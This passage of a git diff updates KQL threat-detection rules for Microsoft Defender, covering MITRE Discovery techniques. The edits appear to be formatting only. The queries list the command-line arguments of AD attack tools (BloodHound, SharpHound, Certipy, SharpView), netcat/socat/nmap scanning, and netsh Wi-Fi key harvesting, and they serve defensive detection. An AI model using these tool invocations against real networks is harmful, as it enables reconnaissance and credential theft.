+// Level: high
+// Description: Detects the initial execution of "cmd.exe" which spawns "explorer.exe" with the appropriate command line arguments for opening the "My Computer" folder.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1135
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "shell:mycomputerfolder" and FolderPath endswith "\\explorer.exe" and (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/firewall_configuration_discovery_via_netsh_exe.kql b/KQL/rules/Discovery/firewall_configuration_discovery_via_netsh_exe.kql
index 5e764c85..5d1c1c84 100644
--- a/KQL/rules/Discovery/firewall_configuration_discovery_via_netsh_exe.kql
+++ b/KQL/rules/Discovery/firewall_configuration_discovery_via_netsh_exe.kql
@@ -1,12 +1,12 @@
-// Title: Firewall Configuration Discovery Via Netsh.EXE
-// Author: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'
-// Date: 2021-12-07
-// Level: low
-// Description: Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1016
-// False Positives:
-// - Administrative activity
-
-DeviceProcessEvents
+// Title: Firewall Configuration Discovery Via Netsh.EXE
+// Author: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'
+// Date: 2021-12-07
+// Level: low
+// Description: Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1016
+// False Positives:
+// - Administrative activity
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains "config " or ProcessCommandLine contains "state " or ProcessCommandLine contains "rule " or ProcessCommandLine contains "name=all") and (ProcessCommandLine contains "netsh" and ProcessCommandLine contains "show " and ProcessCommandLine contains "firewall ")) and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/fsutil_drive_enumeration.kql b/KQL/rules/Discovery/fsutil_drive_enumeration.kql
index 93fb63d7..8031cc61 100644
--- a/KQL/rules/Discovery/fsutil_drive_enumeration.kql
+++ b/KQL/rules/Discovery/fsutil_drive_enumeration.kql
@@ -1,12 +1,12 @@
-// Title: Fsutil Drive Enumeration
-// Author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'
-// Date: 2022-03-29
-// Level: low
-// Description: Attackers may leverage fsutil to enumerated connected drives.
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1120
-// False Positives:
-// - Certain software or administrative tasks may trigger false positives.
-
-DeviceProcessEvents
+// Title: Fsutil Drive Enumeration
+// Author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'
+// Date: 2022-03-29
+// Level: low
+// Description: Attackers may leverage fsutil to enumerated connected drives.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1120
+// False Positives:
+// - Certain software or administrative tasks may trigger false positives.
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "drives" and (FolderPath endswith "\\fsutil.exe" or ProcessVersionInfoOriginalFileName =~ "fsutil.exe")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/gathernetworkinfo_vbs_reconnaissance_script_output.kql b/KQL/rules/Discovery/gathernetworkinfo_vbs_reconnaissance_script_output.kql
index 0e070409..abb5b837 100644
--- a/KQL/rules/Discovery/gathernetworkinfo_vbs_reconnaissance_script_output.kql
+++ b/KQL/rules/Discovery/gathernetworkinfo_vbs_reconnaissance_script_output.kql
@@ -1,10 +1,10 @@
-// Title: GatherNetworkInfo.VBS Reconnaissance Script Output
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-02-08
-// Level: medium
-// Description: Detects creation of files which are the results of executing the built-in reconnaissance script "C:\Windows\System32\gatherNetworkInfo.vbs".
-// MITRE Tactic: Discovery
-// Tags: attack.discovery
-
-DeviceFileEvents
+// Title: GatherNetworkInfo.VBS Reconnaissance Script Output
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-08
+// Level: medium
+// Description: Detects creation of files which are the results of executing the built-in reconnaissance script "C:\Windows\System32\gatherNetworkInfo.vbs".
+// MITRE Tactic: Discovery
+// Tags: attack.discovery
+
+DeviceFileEvents
 | where (FolderPath endswith "\\Hotfixinfo.txt" or FolderPath endswith "\\netiostate.txt" or FolderPath endswith "\\sysportslog.txt" or FolderPath endswith "\\VmSwitchLog.evtx") and FolderPath startswith "C:\\Windows\\System32\\config"
\ No newline at end of file
diff --git a/KQL/rules/Discovery/gpresult_display_group_policy_information.kql b/KQL/rules/Discovery/gpresult_display_group_policy_information.kql
index 24b11f4e..13b61f03 100644
--- a/KQL/rules/Discovery/gpresult_display_group_policy_information.kql
+++ b/KQL/rules/Discovery/gpresult_display_group_policy_information.kql
@@ -1,10 +1,10 @@
-// Title: Gpresult Display Group Policy Information
-// Author: frack113
-// Date: 2022-05-01
-// Level: medium
-// Description: Detects cases in which a user uses the built-in Windows utility gpresult to display the Resultant Set of Policy (RSoP) information
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1615
-
-DeviceProcessEvents
+// Title: Gpresult Display Group Policy Information
+// Author: frack113
+// Date: 2022-05-01
+// Level: medium
+// Description: Detects cases in which a user uses the built-in Windows utility gpresult to display the Resultant Set of Policy (RSoP) information
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1615
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "/z" or ProcessCommandLine contains "/v") and FolderPath endswith "\\gpresult.exe"
\ No newline at end of file
diff --git a/KQL/rules/Discovery/group_membership_reconnaissance_via_whoami_exe.kql b/KQL/rules/Discovery/group_membership_reconnaissance_via_whoami_exe.kql
index c3ec9a4d..fae44daf 100644
--- a/KQL/rules/Discovery/group_membership_reconnaissance_via_whoami_exe.kql
+++ b/KQL/rules/Discovery/group_membership_reconnaissance_via_whoami_exe.kql
@@ -1,10 +1,10 @@
-// Title: Group Membership Reconnaissance Via Whoami.EXE
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-02-28
-// Level: medium
-// Description: Detects the execution of whoami.exe with the /group command line flag to show group membership for the current user, account type, security identifiers (SID), and attributes.
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1033
-
-DeviceProcessEvents
+// Title: Group Membership Reconnaissance Via Whoami.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-28
+// Level: medium
+// Description: Detects the execution of whoami.exe with the /group command line flag to show group membership for the current user, account type, security identifiers (SID), and attributes.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1033
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " /groups" or ProcessCommandLine contains " -groups") and (FolderPath endswith "\\whoami.exe" or ProcessVersionInfoOriginalFileName =~ "whoami.exe")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/hacktool_bloodhound_sharphound_execution.kql b/KQL/rules/Discovery/hacktool_bloodhound_sharphound_execution.kql
index 986fc84f..2b40985d 100644
--- a/KQL/rules/Discovery/hacktool_bloodhound_sharphound_execution.kql
+++ b/KQL/rules/Discovery/hacktool_bloodhound_sharphound_execution.kql
@@ -1,12 +1,12 @@
-// Title: HackTool - Bloodhound/Sharphound Execution
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019-12-20
-// Level: high
-// Description: Detects command line parameters used by Bloodhound and Sharphound hack tools
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1087.001, attack.t1087.002, attack.t1482, attack.t1069.001, attack.t1069.002, attack.execution, attack.t1059.001
-// False Positives:
-// - Other programs that use these command line option and accepts an 'All' parameter
-
-DeviceProcessEvents
+// Title: HackTool - Bloodhound/Sharphound Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-12-20
+// Level: high
+// Description: Detects command line parameters used by Bloodhound and Sharphound hack tools
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1087.001, attack.t1087.002, attack.t1482, attack.t1069.001, attack.t1069.002, attack.execution, attack.t1059.001
+// False Positives:
+// - Other programs that use these command line option and accepts an 'All' parameter
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " -CollectionMethod All " or ProcessCommandLine contains " --CollectionMethods Session " or ProcessCommandLine contains " --Loop --Loopduration " or ProcessCommandLine contains " --PortScanTimeout " or ProcessCommandLine contains ".exe -c All -d " or ProcessCommandLine contains "Invoke-Bloodhound" or ProcessCommandLine contains "Get-BloodHoundData") or (ProcessCommandLine contains " -JsonFolder " and ProcessCommandLine contains " -ZipFileName ") or (ProcessCommandLine contains " DCOnly " and ProcessCommandLine contains " --NoSaveCache ") or (ProcessVersionInfoProductName contains "SharpHound" or ProcessVersionInfoFileDescription contains "SharpHound" or (ProcessVersionInfoCompanyName contains "SpecterOps" or ProcessVersionInfoCompanyName contains "evil corp") or (FolderPath contains "\\Bloodhound.exe" or FolderPath contains "\\SharpHound.exe"))
\ No newline at
end of file
diff --git a/KQL/rules/Discovery/hacktool_certify_execution.kql b/KQL/rules/Discovery/hacktool_certify_execution.kql
index 86ad786b..d76e0175 100644
--- a/KQL/rules/Discovery/hacktool_certify_execution.kql
+++ b/KQL/rules/Discovery/hacktool_certify_execution.kql
@@ -1,10 +1,10 @@
-// Title: HackTool - Certify Execution
-// Author: pH-T (Nextron Systems)
-// Date: 2023-04-17
-// Level: high
-// Description: Detects Certify a tool for Active Directory certificate abuse based on PE metadata characteristics and common command line arguments.
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.credential-access, attack.t1649
-
-DeviceProcessEvents
+// Title: HackTool - Certify Execution
+// Author: pH-T (Nextron Systems)
+// Date: 2023-04-17
+// Level: high
+// Description: Detects Certify a tool for Active Directory certificate abuse based on PE metadata characteristics and common command line arguments.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.credential-access, attack.t1649
+
+DeviceProcessEvents
 | where (FolderPath endswith "\\Certify.exe" or ProcessVersionInfoOriginalFileName =~ "Certify.exe" or ProcessVersionInfoFileDescription contains "Certify") or ((ProcessCommandLine contains ".exe cas " or ProcessCommandLine contains ".exe find " or ProcessCommandLine contains ".exe pkiobjects " or ProcessCommandLine contains ".exe request " or ProcessCommandLine contains ".exe download ") and (ProcessCommandLine contains " /vulnerable" or ProcessCommandLine contains " /template:" or ProcessCommandLine contains " /altname:" or ProcessCommandLine contains " /domain:" or ProcessCommandLine contains " /path:" or ProcessCommandLine contains " /ca:"))
\ No newline at end of file
diff --git a/KQL/rules/Discovery/hacktool_certipy_execution.kql b/KQL/rules/Discovery/hacktool_certipy_execution.kql
index 64a183b5..36cbf366 100644
--- a/KQL/rules/Discovery/hacktool_certipy_execution.kql
+++ b/KQL/rules/Discovery/hacktool_certipy_execution.kql
@@ -1,12 +1,12 @@
-// Title: HackTool - Certipy Execution
-// Author: pH-T (Nextron Systems), Sittikorn Sangrattanapitak
-// Date: 2023-04-17
-// Level: high
-// Description: Detects Certipy execution, a tool for Active Directory Certificate Services enumeration and abuse based on PE metadata characteristics and common command line arguments.
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.credential-access, attack.t1649
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: HackTool - Certipy Execution
+// Author: pH-T (Nextron Systems), Sittikorn Sangrattanapitak
+// Date: 2023-04-17
+// Level: high
+// Description: Detects Certipy execution, a tool for Active Directory Certificate Services enumeration and abuse based on PE metadata characteristics and common command line arguments.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.credential-access, attack.t1649
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where (FolderPath endswith "\\Certipy.exe" or ProcessVersionInfoOriginalFileName =~ "Certipy.exe" or ProcessVersionInfoFileDescription contains "Certipy") or ((ProcessCommandLine contains " account " or ProcessCommandLine contains " auth " or ProcessCommandLine contains " cert " or ProcessCommandLine contains " find " or ProcessCommandLine contains " forge " or ProcessCommandLine contains " ptt " or ProcessCommandLine contains " relay " or ProcessCommandLine contains " req " or ProcessCommandLine contains " shadow " or ProcessCommandLine contains " template ") and (ProcessCommandLine contains " -bloodhound" or ProcessCommandLine contains " -ca-pfx " or ProcessCommandLine contains " -dc-ip " or ProcessCommandLine contains " -kirbi" or ProcessCommandLine contains " -old-bloodhound" or ProcessCommandLine contains " -pfx " or ProcessCommandLine contains " -target" or ProcessCommandLine contains " -template" or ProcessCommandLine contains " -username " or ProcessCommandLine contains " -vulnerable" or
ProcessCommandLine contains "auth -pfx" or ProcessCommandLine contains "shadow auto" or ProcessCommandLine contains "shadow list"))
\ No newline at end of file
diff --git a/KQL/rules/Discovery/hacktool_sharpldapmonitor_execution.kql b/KQL/rules/Discovery/hacktool_sharpldapmonitor_execution.kql
index 426d1dbd..23bd8274 100644
--- a/KQL/rules/Discovery/hacktool_sharpldapmonitor_execution.kql
+++ b/KQL/rules/Discovery/hacktool_sharpldapmonitor_execution.kql
@@ -1,10 +1,10 @@
-// Title: HackTool - SharpLDAPmonitor Execution
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-12-30
-// Level: medium
-// Description: Detects execution of the SharpLDAPmonitor. Which can monitor the creation, deletion and changes to LDAP objects.
-// MITRE Tactic: Discovery
-// Tags: attack.discovery
-
-DeviceProcessEvents
+// Title: HackTool - SharpLDAPmonitor Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-12-30
+// Level: medium
+// Description: Detects execution of the SharpLDAPmonitor. Which can monitor the creation, deletion and changes to LDAP objects.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "/user:" and ProcessCommandLine contains "/pass:" and ProcessCommandLine contains "/dcip:") or (FolderPath endswith "\\SharpLDAPmonitor.exe" or ProcessVersionInfoOriginalFileName =~ "SharpLDAPmonitor.exe")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/hacktool_sharpldapwhoami_execution.kql b/KQL/rules/Discovery/hacktool_sharpldapwhoami_execution.kql
index 692e24e8..c1d91ab5 100644
--- a/KQL/rules/Discovery/hacktool_sharpldapwhoami_execution.kql
+++ b/KQL/rules/Discovery/hacktool_sharpldapwhoami_execution.kql
@@ -1,12 +1,12 @@
-// Title: HackTool - SharpLdapWhoami Execution
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022-08-29
-// Level: high
-// Description: Detects SharpLdapWhoami, a whoami alternative that queries the LDAP service on a domain controller
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1033, car.2016-03-001
-// False Positives:
-// - Programs that use the same command line flags
-
-DeviceProcessEvents
+// Title: HackTool - SharpLdapWhoami Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-08-29
+// Level: high
+// Description: Detects SharpLdapWhoami, a whoami alternative that queries the LDAP service on a domain controller
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1033, car.2016-03-001
+// False Positives:
+// - Programs that use the same command line flags
+
+DeviceProcessEvents
 | where (ProcessCommandLine endswith " /method:ntlm" or ProcessCommandLine endswith " /method:kerb" or ProcessCommandLine endswith " /method:nego" or ProcessCommandLine endswith " /m:nego" or ProcessCommandLine endswith " /m:ntlm" or ProcessCommandLine endswith " /m:kerb") or FolderPath endswith "\\SharpLdapWhoami.exe" or (ProcessVersionInfoOriginalFileName contains "SharpLdapWhoami" or ProcessVersionInfoProductName =~ "SharpLdapWhoami")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/hacktool_sharpview_execution.kql b/KQL/rules/Discovery/hacktool_sharpview_execution.kql
index 7e30744c..200d5400 100644
--- a/KQL/rules/Discovery/hacktool_sharpview_execution.kql
+++ b/KQL/rules/Discovery/hacktool_sharpview_execution.kql
@@ -1,10 +1,10 @@
-// Title: HackTool - SharpView Execution
-// Author: frack113
-// Date: 2021-12-10
-// Level: high
-// Description: Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1049, attack.t1069.002, attack.t1482, attack.t1135, attack.t1033
-
-DeviceProcessEvents
+// Title: HackTool - SharpView Execution
+// Author: frack113
+// Date: 2021-12-10
+// Level: high
+// Description: Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1049, attack.t1069.002, attack.t1482, attack.t1135, attack.t1033
+
+DeviceProcessEvents
 | where ProcessVersionInfoOriginalFileName =~ "SharpView.exe" or FolderPath endswith "\\SharpView.exe" or (ProcessCommandLine contains "Add-RemoteConnection" or ProcessCommandLine contains "Convert-ADName" or ProcessCommandLine contains "ConvertFrom-SID" or ProcessCommandLine contains "ConvertFrom-UACValue" or ProcessCommandLine contains "Convert-SidToName" or ProcessCommandLine contains "Export-PowerViewCSV" or ProcessCommandLine contains "Find-DomainObjectPropertyOutlier" or ProcessCommandLine contains "Find-DomainProcess" or ProcessCommandLine contains "Find-DomainShare" or ProcessCommandLine contains "Find-DomainUserEvent" or ProcessCommandLine contains "Find-DomainUserLocation" or ProcessCommandLine contains "Find-ForeignGroup" or ProcessCommandLine contains "Find-ForeignUser" or ProcessCommandLine contains "Find-GPOComputerAdmin" or ProcessCommandLine contains "Find-GPOLocation" or ProcessCommandLine contains "Find-Interesting" or ProcessCommandLine contains "Find-LocalAdminAccess" or ProcessCommandLine contains "Find-ManagedSecurityGroups" or ProcessCommandLine contains "Get-CachedRDPConnection" or
ProcessCommandLine contains "Get-DFSshare" or ProcessCommandLine contains "Get-DomainComputer" or ProcessCommandLine contains "Get-DomainController" or ProcessCommandLine contains "Get-DomainDFSShare" or ProcessCommandLine contains "Get-DomainDNSRecord" or ProcessCommandLine contains "Get-DomainFileServer" or ProcessCommandLine contains "Get-DomainForeign" or ProcessCommandLine contains "Get-DomainGPO" or ProcessCommandLine contains "Get-DomainGroup" or ProcessCommandLine contains "Get-DomainGUIDMap" or ProcessCommandLine contains "Get-DomainManagedSecurityGroup" or ProcessCommandLine contains "Get-DomainObject" or ProcessCommandLine contains "Get-DomainOU" or ProcessCommandLine contains "Get-DomainPolicy" or ProcessCommandLine contains "Get-DomainSID" or ProcessCommandLine contains "Get-DomainSite" or ProcessCommandLine contains "Get-DomainSPNTicket" or ProcessCommandLine contains "Get-DomainSubnet" or ProcessCommandLine contains "Get-DomainTrust" or ProcessCommandLine contains "Get-DomainUserEvent" or ProcessCommandLine contains "Get-ForestDomain" or ProcessCommandLine contains "Get-ForestGlobalCatalog" or ProcessCommandLine contains "Get-ForestTrust" or ProcessCommandLine contains "Get-GptTmpl" or ProcessCommandLine contains "Get-GroupsXML" or ProcessCommandLine contains "Get-LastLoggedOn" or ProcessCommandLine contains "Get-LoggedOnLocal" or ProcessCommandLine contains "Get-NetComputer" or ProcessCommandLine contains "Get-NetDomain" or ProcessCommandLine contains "Get-NetFileServer" or ProcessCommandLine contains "Get-NetForest" or ProcessCommandLine contains "Get-NetGPO" or ProcessCommandLine contains "Get-NetGroupMember" or ProcessCommandLine contains "Get-NetLocalGroup" or ProcessCommandLine contains "Get-NetLoggedon" or ProcessCommandLine contains "Get-NetOU" or ProcessCommandLine contains "Get-NetProcess" or ProcessCommandLine contains "Get-NetRDPSession" or ProcessCommandLine contains "Get-NetSession" or ProcessCommandLine contains "Get-NetShare" or 
ProcessCommandLine contains "Get-NetSite" or ProcessCommandLine contains "Get-NetSubnet" or ProcessCommandLine contains "Get-NetUser" or ProcessCommandLine contains "Get-PathAcl" or ProcessCommandLine contains "Get-PrincipalContext" or ProcessCommandLine contains "Get-RegistryMountedDrive" or ProcessCommandLine contains "Get-RegLoggedOn" or ProcessCommandLine contains "Get-WMIRegCachedRDPConnection" or ProcessCommandLine contains "Get-WMIRegLastLoggedOn" or ProcessCommandLine contains "Get-WMIRegMountedDrive" or ProcessCommandLine contains "Get-WMIRegProxy" or ProcessCommandLine contains "Invoke-ACLScanner" or ProcessCommandLine contains "Invoke-CheckLocalAdminAccess" or ProcessCommandLine contains "Invoke-Kerberoast" or ProcessCommandLine contains "Invoke-MapDomainTrust" or ProcessCommandLine contains "Invoke-RevertToSelf" or ProcessCommandLine contains "Invoke-Sharefinder" or ProcessCommandLine contains "Invoke-UserImpersonation" or ProcessCommandLine contains "Remove-DomainObjectAcl" or ProcessCommandLine contains "Remove-RemoteConnection" or ProcessCommandLine contains "Request-SPNTicket" or ProcessCommandLine contains "Set-DomainObject" or ProcessCommandLine contains "Test-AdminAccess")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/hacktool_soaphound_execution.kql b/KQL/rules/Discovery/hacktool_soaphound_execution.kql
index a3e8f54f..f6ad57ad 100644
--- a/KQL/rules/Discovery/hacktool_soaphound_execution.kql
+++ b/KQL/rules/Discovery/hacktool_soaphound_execution.kql
@@ -1,10 +1,10 @@
-// Title: HackTool - SOAPHound Execution
-// Author: @kostastsale
-// Date: 2024-01-26
-// Level: high
-// Description: Detects the execution of SOAPHound, a .NET tool for collecting Active Directory data, using specific command-line arguments that may indicate an attempt to extract sensitive AD information.
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1087
-
-DeviceProcessEvents
+// Title: HackTool - SOAPHound Execution
+// Author: @kostastsale
+// Date: 2024-01-26
+// Level: high
+// Description: Detects the execution of SOAPHound, a .NET tool for collecting Active Directory data, using specific command-line arguments that may indicate an attempt to extract sensitive AD information.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1087
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " --buildcache " or ProcessCommandLine contains " --bhdump " or ProcessCommandLine contains " --certdump " or ProcessCommandLine contains " --dnsdump ") and (ProcessCommandLine contains " -c " or ProcessCommandLine contains " --cachefilename " or ProcessCommandLine contains " -o " or ProcessCommandLine contains " --outputdirectory")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/hacktool_trufflesnout_execution.kql b/KQL/rules/Discovery/hacktool_trufflesnout_execution.kql
index 8d00d224..3daaec2e 100644
--- a/KQL/rules/Discovery/hacktool_trufflesnout_execution.kql
+++ b/KQL/rules/Discovery/hacktool_trufflesnout_execution.kql
@@ -1,10 +1,10 @@
-// Title: HackTool - TruffleSnout Execution
-// Author: frack113
-// Date: 2022-08-20
-// Level: high
-// Description: Detects the use of TruffleSnout.exe an iterative AD discovery toolkit for offensive operators, situational awareness and targeted low noise enumeration.
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1482
-
-DeviceProcessEvents
+// Title: HackTool - TruffleSnout Execution
+// Author: frack113
+// Date: 2022-08-20
+// Level: high
+// Description: Detects the use of TruffleSnout.exe an iterative AD discovery toolkit for offensive operators, situational awareness and targeted low noise enumeration.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1482
+
+DeviceProcessEvents
 | where ProcessVersionInfoOriginalFileName =~ "TruffleSnout.exe" or FolderPath endswith "\\TruffleSnout.exe"
\ No newline at end of file
diff --git a/KQL/rules/Discovery/harvesting_of_wifi_credentials_via_netsh_exe.kql b/KQL/rules/Discovery/harvesting_of_wifi_credentials_via_netsh_exe.kql
index 25d15566..404ff7a2 100644
--- a/KQL/rules/Discovery/harvesting_of_wifi_credentials_via_netsh_exe.kql
+++ b/KQL/rules/Discovery/harvesting_of_wifi_credentials_via_netsh_exe.kql
@@ -1,10 +1,10 @@
-// Title: Harvesting Of Wifi Credentials Via Netsh.EXE
-// Author: Andreas Hunkeler (@Karneades), oscd.community
-// Date: 2020-04-20
-// Level: medium
-// Description: Detect the harvesting of wifi credentials using netsh.exe
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.credential-access, attack.t1040
-
-DeviceProcessEvents
+// Title: Harvesting Of Wifi Credentials Via Netsh.EXE
+// Author: Andreas Hunkeler (@Karneades), oscd.community
+// Date: 2020-04-20
+// Level: medium
+// Description: Detect the harvesting of wifi credentials using netsh.exe
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.credential-access, attack.t1040
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "wlan" and ProcessCommandLine contains " s" and ProcessCommandLine contains " p" and ProcessCommandLine contains " k" and ProcessCommandLine contains "=clear") and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/linux_network_service_scanning_tools_execution.kql b/KQL/rules/Discovery/linux_network_service_scanning_tools_execution.kql
index 0dd0897b..5862f1fe 100644
--- a/KQL/rules/Discovery/linux_network_service_scanning_tools_execution.kql
+++ b/KQL/rules/Discovery/linux_network_service_scanning_tools_execution.kql
@@ -1,12 +1,12 @@
-// Title: Linux Network Service Scanning Tools Execution
-// Author: Alejandro Ortuno, oscd.community, Georg Lauenstein (sure[secure])
-// Date: 2020-10-21
-// Level: low
-// Description: Detects execution of network scanning and reconnaisance tools. These tools can be used for the enumeration of local or remote network services for example.
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1046
-// False Positives:
-// - Legitimate administration activities
-
-DeviceProcessEvents
+// Title: Linux Network Service Scanning Tools Execution
+// Author: Alejandro Ortuno, oscd.community, Georg Lauenstein (sure[secure])
+// Date: 2020-10-21
+// Level: low
+// Description: Detects execution of network scanning and reconnaisance tools. These tools can be used for the enumeration of local or remote network services for example.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1046
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
 | where ((FolderPath endswith "/nc" or FolderPath endswith "/ncat" or FolderPath endswith "/netcat" or FolderPath endswith "/socat") and (not((ProcessCommandLine contains " --listen " or ProcessCommandLine contains " -l ")))) or (FolderPath endswith "/autorecon" or FolderPath endswith "/hping" or FolderPath endswith "/hping2" or FolderPath endswith "/hping3" or FolderPath endswith "/naabu" or FolderPath endswith "/nmap" or FolderPath endswith "/nping" or FolderPath endswith "/telnet" or FolderPath endswith "/zenmap")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/linux_remote_system_discovery.kql b/KQL/rules/Discovery/linux_remote_system_discovery.kql
index c993b989..512b68b4 100644
--- a/KQL/rules/Discovery/linux_remote_system_discovery.kql
+++ b/KQL/rules/Discovery/linux_remote_system_discovery.kql
@@ -1,12 +1,12 @@
-// Title: Linux Remote System Discovery
-// Author: Alejandro Ortuno, oscd.community
-// Date: 2020-10-22
-// Level: low
-// Description: Detects the enumeration of other remote systems.
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1018
-// False Positives:
-// - Legitimate administration activities
-
-DeviceProcessEvents
+// Title: Linux Remote System Discovery
+// Author: Alejandro Ortuno, oscd.community
+// Date: 2020-10-22
+// Level: low
+// Description: Detects the enumeration of other remote systems.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1018
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "-a" and FolderPath endswith "/arp") or ((ProcessCommandLine contains " 10." or ProcessCommandLine contains " 192.168." or ProcessCommandLine contains " 172.16." or ProcessCommandLine contains " 172.17." or ProcessCommandLine contains " 172.18." or ProcessCommandLine contains " 172.19." or ProcessCommandLine contains " 172.20." or ProcessCommandLine contains " 172.21." or ProcessCommandLine contains " 172.22." or ProcessCommandLine contains " 172.23." or ProcessCommandLine contains " 172.24." or ProcessCommandLine contains " 172.25." or ProcessCommandLine contains " 172.26." or ProcessCommandLine contains " 172.27." or ProcessCommandLine contains " 172.28." or ProcessCommandLine contains " 172.29." or ProcessCommandLine contains " 172.30." or ProcessCommandLine contains " 172.31." or ProcessCommandLine contains " 127." or ProcessCommandLine contains " 169.254.") and FolderPath endswith "/ping")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/local_accounts_discovery.kql b/KQL/rules/Discovery/local_accounts_discovery.kql
index 5eedc70d..fed49bcc 100644
--- a/KQL/rules/Discovery/local_accounts_discovery.kql
+++ b/KQL/rules/Discovery/local_accounts_discovery.kql
@@ -1,12 +1,12 @@
-// Title: Local Accounts Discovery
-// Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community
-// Date: 2019-10-21
-// Level: low
-// Description: Local accounts, System Owner/User discovery using operating systems utilities
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1033, attack.t1087.001
-// False Positives:
-// - Legitimate administrator or user enumerates local users for legitimate reason
-
-DeviceProcessEvents
+// Title: Local Accounts Discovery
+// Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community
+// Date: 2019-10-21
+// Level: low
+// Description: Local accounts, System Owner/User discovery using operating systems utilities
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1033, attack.t1087.001
+// False Positives:
+// - Legitimate administrator or user enumerates local users for legitimate reason
+
+DeviceProcessEvents
